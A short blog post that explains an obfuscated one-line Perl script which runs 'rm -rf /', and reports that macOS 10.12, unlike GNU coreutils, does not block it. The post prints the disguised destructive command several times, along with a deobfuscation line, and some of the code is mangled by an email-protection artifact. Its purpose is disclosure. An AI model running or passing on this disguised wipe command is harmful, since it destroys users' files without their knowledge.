‘rm -rf /’ still works on OSX

Earlier this week someone sent me this one line perl script (that you shouldn’t run):
perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;; y; -/:[email protected][-`{-};`-{/" -;;s;;$_;see'

Due to some really clever code obfuscation  it runs rm -rf /.

You  can deobfuscate (is that word?) with this:
perl -e 's;;=]=>%-{<-|}<&|`{;; y; -/:[email protected][-`{-};`-{/" -;;print "$_\n"'

While trying to figure out how this code code I stumbled upon the fact that OSX does not require  --no-preserve-root which has been required since version 6.4 of GNU Core Utilities which was released in 2006.

Here is what happens if you run perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;; y; -/:[email protected][-`{-};`-{/" -;;s;;$_;see'  on Ubuntu 16:10:

Screen Shot 2016-10-16 at 7.54.36 PMHere is what happens if you run perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;; y; -/:[email protected][-`{-};`-{/" -;;s;;$_;see'  on MacOS 10.12:

2016-10-16 19.59.13

This seems like a pretty big oversight by the Apple Team and I have filled a bug report but haven’t heard anything yet.

Site Footer